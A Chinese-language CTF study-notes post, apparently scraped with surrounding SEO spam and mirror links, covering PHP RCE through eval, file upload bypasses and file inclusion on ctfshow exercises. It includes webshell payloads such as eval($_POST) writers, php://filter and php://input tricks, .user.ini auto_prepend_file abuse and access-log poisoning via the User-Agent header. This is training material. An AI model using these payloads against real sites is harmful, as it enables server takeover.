当前位置: 首页 > wzjs >正文

江苏seo哪家好seo的方式包括

江苏seo哪家好,seo的方式包括,住房和城乡建设部网站职责,网站增加一体化建设功能的好处RCE 第一题 eval代码执行 : 1、使用system 加通配符过滤 ?csystem("tac%20fl*") ; 2、反字节执行 xxx %20 echo 反字节 3、变量转移 重新定义一个变量 让他代替我们执行 4、伪协议玩法 ?cinclude$_GET[1]?>&1php://filter/readc…

RCE

第一题

eval代码执行 : 1、使用system 加通配符过滤

?c=system("tac%20fl*") ;

2、反字节执行      `xxx`

%20

echo + 反字节

3、变量转移

重新定义一个变量 让他代替我们执行

4、伪协议玩法

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

或者直接写入木马 file_put_contents(11.php,"<?php eval($_POST['cmd'])?>");

5、拷贝

?c=system("cp fla* 1.txt")

访问1.txt

复习完练习一个

代码执行

当然还是可以使用伪协议

复习之

文件上传漏洞

ctfshow练习

看介绍是前端的验证 :

玩法 :欺骗前端验证

使用gzl生成一个

改为 jpg后缀 之后上传

知道密码之后如果木马是post方式的传输就能使用这个post口直接进行传输

2、

后端的验证要严密 :

为了防止后端验证文件头 所以写个假的文件头 让它去验证

利用第一个的老套路居然上传成功了这是我没想到的

3、黑名单绕过 :

我们上传的文件只有png能上传成功说明是后端的waf

改一下ini为png后缀一会再改名 .user.ini

写入 :

auto_prepend_file=shell.png

上传一个 木马文件 shell.png

记住在 /upload下执行命令

文件包含

主要涉及到文件的读取,写入,代码执行

1个题全部展示

文件的读取 :

file=php://filter/read=convert.base64-encode/resource=flag.php

把这个base64解密就出来了

2、文件的写入

换一个单词就能用

在post中写入就行 但是这个的条件是有 file_put_contents

这个好用:

php://input

POST <?php fputs(fopen("shell.php","w") , '<?php @eval($_POST["pass"])?>')?>

文件的写入在ctf中非常麻烦所以不常用 同时上边文件的读取不知道 flag 的位置瞎猜也是非常难受 所以下边这个 命令执行非常牛x

3、命令执行

上边的写入其实就是命令的执行啊

php://input 加post就是这种

写上之后就能执行命令了很强

再一个就是 data 协议

利用data协议实现代码执行

使用加密

还有一个就是 文件包含的唯一真神 只要看着一堆 waf 绕不过了 直接使用

非常不吃操作

只需要记住 不同2个中间件的日志

apache : /www/log/apache/access.log

nginx : /www/log/nginx/access.log

怎么判断是哪个?

根据报错发现我们的路径错误了

抓个包 改一下这个ua头信息为恶意的木马

就成功注入了


文章转载自:

http://V3K9cY3k.qwdLj.cn
http://MppuJU5h.qwdLj.cn
http://4nOdCu2a.qwdLj.cn
http://PLgJkzzB.qwdLj.cn
http://ZfP6Thec.qwdLj.cn
http://vu84ilAE.qwdLj.cn
http://2zzKnkNr.qwdLj.cn
http://xfZWsi7y.qwdLj.cn
http://4a4HzqpL.qwdLj.cn
http://IMlaS7lT.qwdLj.cn
http://iSbpH6dG.qwdLj.cn
http://LW80fFv7.qwdLj.cn
http://mn66MTnM.qwdLj.cn
http://czRFIyFc.qwdLj.cn
http://eazqhmn1.qwdLj.cn
http://l1VL5nQy.qwdLj.cn
http://Y8kpUS0z.qwdLj.cn
http://mM5yU4r0.qwdLj.cn
http://PDmgFLTT.qwdLj.cn
http://giGPLrte.qwdLj.cn
http://AuHmcaub.qwdLj.cn
http://3nhpyJai.qwdLj.cn
http://2sfgwfCF.qwdLj.cn
http://KQagP7c0.qwdLj.cn
http://bl6LqCdY.qwdLj.cn
http://hKLZjn75.qwdLj.cn
http://1cHR7YZH.qwdLj.cn
http://31wANXUy.qwdLj.cn
http://hdSVtYcI.qwdLj.cn
http://ltUV53Le.qwdLj.cn
http://www.dtcms.com/wzjs/638649.html

相关文章:

  • 网站设计导航栏怎么做家庭电脑可以做网站吗
  • 电脑公司网站源码wordpress cos-html-cache
  • 河南建设部网站连云港网站建设培训
  • 网站收录量低怎么做新华网站建设
  • 漳州本地企业网站建设服务黑群晖建设个人网站
  • 做视频网站公司要怎么做成都集团网站建设
  • 网站建设找天宇智能中天建设集团有限公司简介
  • 深圳市住房建设局网站首页天津网站建设制作软件
  • django 网站开发实例南京微信小程序开发制作
  • 建企业网站建设营销型网站的目的有哪些
  • 绍兴市网站建设公司百度小程序审核
  • 机械公司网站模板进入公众号看不到内容
  • 写作网站免费杭州网站建设工作室
  • 住建部禾建设部是一个网站吗东莞银行
  • 做采购 通常在什么网站看企业网络推广哪家公司好
  • 网站建设中 html免费企业服务平台上线
  • 傻瓜内网网站建设seo投放
  • 城市网站建设分析报告清远网站seo公司
  • 网站域名的作用是什么新泰网络推广公司
  • 设计软件网站推荐优质外链平台
  • 广州市建设工程招标管理办公室网站自己在网站开发的客户怎么联系
  • 邢台建设网站曲靖企业网站
  • 网站打开速度慢跟什么有关系网站建设会计科目
  • 个人网站首页布局图有了源码怎么搭建网站
  • 美容加盟的网站建设绿色食品网站开发步骤
  • wordpress设置2个网站专门做本子的网站
  • 如何做好企业网站建设工作微电商平台
  • 做网站需要哪些审核信誉楼线上商城小程序
  • 做营销网站企业深圳做外贸网站
  • 会ps的如何做网站网站如何做首面关键词